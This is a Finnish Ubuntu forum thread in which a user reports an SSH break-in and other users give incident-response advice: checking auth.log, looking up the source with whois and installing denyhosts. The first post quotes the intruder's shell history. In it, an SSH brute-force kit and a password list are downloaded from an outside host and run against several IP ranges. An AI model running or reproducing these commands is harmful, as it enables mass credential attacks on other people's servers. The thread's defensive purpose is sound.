Ubuntu Suomen keskustelualueet

Ubuntun käyttö => Ohjelmointi, palvelimet ja muu edistyneempi käyttö => Aiheen aloitti: Leko - 28.01.09 - klo:16.18

Otsikko: Haittaohjelma_SSH
Kirjoitti: Leko - 28.01.09 - klo:16.18

Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus. Sen .bash_historia näyttää tältä:

Koodia: [Valitse]

w
cd .cbk
cd fhc
wget http://users.volja.net/passlists/fhc.tar.gz
tar -xzvf fhc.tar.gz
cd fhc
./start 84.244
wget http://users.volja.net/passlists/norrox.txt
mv norrox.txt pass_file
./start 128.39
./start 199.6;./start 204.79;./start 204.231;./start 205.248
Paketti on mulla vielä tallessa. Kertokaapa, kuka tai mikä taho olisi oikeasti kiinnostunut asiasta. Yst. vast. tänne tai privalla.

Otsikko: Vs: Haittaohjelma_SSH
Kirjoitti: Tuplanolla - 28.01.09 - klo:16.45

Kannattaapi katsella mistä ip-osoitteista tälläinen on tullut.

Eli grep sshd <käyttäjänimi> /var/log/auth.log
Sieltä pitäisi löytyä rivejä tyyliin:

Lainaus

Jan 28 13:44:51 zeus sshd[15824]: Accepted password for joona from 192.168.0.102 port 1036 ssh2

Siitä poimit ip-osoitteen ja laitat päätteeseen että whois <ip-osoite>.
Sepä kertoo sitten mikä isp toisessa päässä on ja varmaan löytyy myös sähköpostiosoite mihin voi ottaa yhteyttä. Usein tyyliin abuse@isp.pääte.

Otsikko: Vs: Haittaohjelma_SSH
Kirjoitti: Leko - 28.01.09 - klo:17.34

Tuoltapäin näyttää olevan, vaikka en minä mitään sillä tiedolla tee.

IP address   84.255.243.157
Hostname   84-255-243-157.static.t-2.net
ISP   T-2 Access Network
Country   Slovenia Slovenia

Otsikko: Vs: Haittaohjelma_SSH
Kirjoitti: mgronber - 28.01.09 - klo:18.06

Lainaus käyttäjältä: Leko - 28.01.09 - klo:16.18

Netin tarjoilija pani yhteyteni kiinni. Syy se, että koneestani oli skannailtu ssh:lla runsaahkosti. Löytyi yksi murrettu käyttäjätunnus.

Ensi kerralla kannattaa laittaa koneelle denyhosts tai vastaava jotta skannailut eivät onnistu yhtä helposti.